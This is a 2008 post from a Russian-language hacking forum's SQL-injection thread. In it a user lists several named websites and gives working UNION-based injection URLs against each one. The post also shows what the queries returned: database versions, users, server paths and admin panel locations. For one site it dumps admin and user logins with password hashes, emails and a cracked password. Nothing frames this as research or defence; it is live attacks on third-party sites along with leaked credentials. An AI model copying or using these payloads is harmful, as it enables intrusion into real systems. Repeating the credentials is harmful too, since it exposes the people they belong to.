ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 03.08.2008, 00:01
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию
http://popsdb.twystneko.com
Код:
http://popsdb.twystneko.com/list.php?id=1+union+select+unhex(hex(concat_ws(0x3a,version(),user(),database())))+limit+1,1--

version() - 5.0.51a-community
user() - twystneko@localhost
database() - twystneko
Раскрытие пути - /home/virtual/site198/fst/var/www/popsdb/list.php
Админка - http://popsdb.twystneko.com/admin


Далее, база с админом:
Код:
http://popsdb.twystneko.com/list.php?id=1+union+select+unhex(hex(concat_ws(0x3a,user_login,user_pass,user_email)))+from+nc_users+limit+1,1--
admin:2dfc97e5e093b4b339ad510433d2e9ff:cafe@nakedc ybercafe.com - расшифрованный пасс: naked

Ещё одна база всего с 1 человеком:
Код:
http://popsdb.twystneko.com/list.php?id=1+union+select+unhex(hex(concat_ws(0x3a,user_login,user_pass,user_email)))+from+bg_users+limit+2,1--
stephen:3e5a1b3b990187c9fb8e8156ce25c243:stephen@i crossroads.com

++++++++++++ Пойдём дальше.


http://dennis-oppenheim.com
Код:
http://www.dennis-oppenheim.com/list.php?id=-1+union+select+concat(0x3a,version(),0x3a,user(),0x3a,database()),1,1/*

version() - 5.0.51a-community
user() - twystneko@localhost
database() - twystneko
Раскрытие пути - /hsphere/local/home/rhjo2/dennis-oppenheim.com/list.php

++++++++++++ Пойдём дальше.


http://hivolume.com
Код:
http://www.hivolume.com/en/list.php?aftermarket_part=-1+union+select+aes_decrypt(aes_encrypt(version(),1),1),555/*
http://www.hivolume.com/en/list.php?aftermarket_part=-1+union+select+aes_decrypt(aes_encrypt(user(),1),1),555/*
http://www.hivolume.com/en/list.php?aftermarket_part=-1+union+select+aes_decrypt(aes_encrypt(database(),1),1),555/*

version() - 4.1.11-Max
user() - yads@localhost
database() - hivolume
Раскрытие пути - /home/sites/site4/web/en/list.php

++++++++++++
Так-же отдельное спасибо пользователям "sabe" и "Basurman", за помощь в вопросах по SQL.
Последний раз редактировалось Nightmarе; 03.08.2008 в 01:00..
 
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ